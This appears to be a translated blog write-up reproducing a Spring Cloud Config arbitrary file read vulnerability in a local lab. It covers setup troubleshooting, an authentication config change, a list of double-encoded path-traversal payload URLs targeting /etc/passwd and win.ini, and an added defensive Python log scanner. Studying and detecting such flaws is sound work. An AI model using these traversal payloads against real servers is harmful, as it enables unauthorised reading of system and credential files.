微慑信息网

Spring Cloud Config arbitrary file read test

1. Download a vulnerable version of Spring Cloud Config:

https://github.com/spring-cloud/spring-cloud-config/releases

Spring Cloud Config 2.1.0 to 2.1.1

Spring Cloud Config 2.0.0 to 2.0.3

Spring Cloud Config 1.4.0 to 1.4.5


2. After downloading, open it in IDEA and build with Maven:

Since I am not familiar with Java Spring myself, after loading the project I just hit "run",

but it kept reporting an error:

2019-07-16 23:37:15.984 INFO 20988 --- [ main] c.c.c.ConfigServicePropertySourceLocator : Fetching config from server at: http://localhost:8888
2019-07-16 23:37:17.175 WARN 20988 --- [ main] c.c.c.ConfigServicePropertySourceLocator : Could not locate PropertySource: I/O error on GET request for "http://localhost:8888/bar/default": Connection refused: connect; nested exception is java.net.ConnectException: Connection refused: connect

I looked up a lot of material online, and all of it said it was a configuration problem. Later I asked SN, and the likely cause is that the wrong module was being run, since the vulnerability being tested is on the server side:

(1) Follow the official documentation:

(2) Or, in IDEA, select \spring-cloud-config-server\src\main\java\org\springframework\cloud\config\server\ConfigServerApplication.java

and click Run:

Check the result:

The warning is gone now, but at the bottom there is a Tomcat error, which doesn't matter; I don't know exactly what causes it either:

java.lang.IllegalArgumentException: Invalid character found in method name. HTTP method names must be tokens
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:428) ~[tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:687) ~[tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:790) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1468) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) [tomcat-embed-core-8.5.31.jar:8.5.31]
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [na:1.8.0_191]
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [na:1.8.0_191]
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) [tomcat-embed-core-8.5.31.jar:8.5.31]
at java.lang.Thread.run(Thread.java:748) [na:1.8.0_191]

Test access to http://127.0.0.1:8888/admin/info: works normally.

Access http://127.0.0.1:8888/admin/env: returns 401:

401 is an authentication problem; after looking it up, the file to modify is:

\spring-cloud-config-1.4.4.RELEASE\spring-cloud-config-server\src\main\resources\configserver.yml

The default is as follows:


Add under the management node:

After modification:


Run again, and it works:


(3) Test the arbitrary file read:

Set Accept: text/html,application/xhtml+xml,application/xml;q=0.9,application/octet-stream,image/webp,image/apng,*/*;q=0.8

Main payloads (`{..%252F}*n` means the `..%252F` sequence repeated n times):

http://xxx:8888/a/b/master/ + {..%252F}*2 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*6 + Windows%252Fwin.ini
http://xxx:8888/a/b/master/ + {..%252F}*50 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*50 + Windows%252Fwin.ini
http://xxx:8888/a/b/c/ + {..%252F}*3 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*7 + Windows%252Fwin.ini?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + Windows%252Fwin.ini?useDefaultLabel=a
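As an added, defender-side example (it is not from the original post and not c0ny1's script), the following Python checks two things the post relies on: whether a version string falls inside the affected ranges listed at the top, and whether a request path in an access log, once URL-decoded twice, contains a `..` segment of the kind the payloads above use. The access-log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). The last
# two are shaped like the payloads listed above; the first two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jul/2019:23:40:01 +0800] "GET /admin/info HTTP/1.1" 200 512
10.0.0.5 - - [16/Jul/2019:23:40:02 +0800] "GET /app/default/master/application.yml HTTP/1.1" 200 1024
10.0.0.9 - - [16/Jul/2019:23:41:10 +0800] "GET /a/b/master/..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 2048
10.0.0.9 - - [16/Jul/2019:23:41:11 +0800] "GET /a/b/c/..%252F..%252F..%252FWindows%252Fwin.ini?useDefaultLabel=a HTTP/1.1" 200 400
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')

# Version ranges quoted in the post (1.4.0-1.4.5, 2.0.0-2.0.3, 2.1.0-2.1.1).
AFFECTED = [((1, 4, 0), (1, 4, 5)), ((2, 0, 0), (2, 0, 3)), ((2, 1, 0), (2, 1, 1))]

def is_affected_version(version):
    """True if a Spring Cloud Config version string (e.g. '1.4.4.RELEASE')
    falls inside one of the affected ranges above."""
    parts = tuple(int(p) for p in version.split(".")[:3] if p.isdigit())
    nums = (parts + (0, 0, 0))[:3]
    return any(lo <= nums <= hi for lo, hi in AFFECTED)

def decode_twice(path):
    """Undo the double URL-encoding the payloads rely on: %252F -> %2F -> /."""
    return unquote(unquote(path))

def is_traversal(path):
    """True if the path, with its query string dropped and decoded twice, holds
    a '..' segment, i.e. it tries to climb out of the {app}/{profile}/{label} tree."""
    decoded = decode_twice(path.split("?", 1)[0])
    return ".." in decoded.replace("\\", "/").split("/")

def scan_log(text):
    """Return (line_no, client_ip, decoded_path) for every suspicious request."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group("path")):
            decoded = decode_twice(match.group("path").split("?", 1)[0])
            hits.append((line_no, line.split(" ", 1)[0], decoded))
    return hits

if __name__ == "__main__":
    for line_no, client, path in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {client} requested {path}")
```

Decoding twice matters because a single decode of `..%252F` still looks like a harmless literal `..%2F` to a naive filter.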

Detection script:

Refer to the analysis by c0ny1 on gv7.me.

Further reading (commentary/background):

See:

http://www.lmxspace.com/2019/04/26/Spring-Cloud-Config-Server-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%88%86%E6%9E%90/

http://gv7.me/articles/2019/write-cve-2019-3799-batch-scan-script/

Screenshot below:


Original link: http://vulsee.com/archives/vulsee_2019/0716_8385.html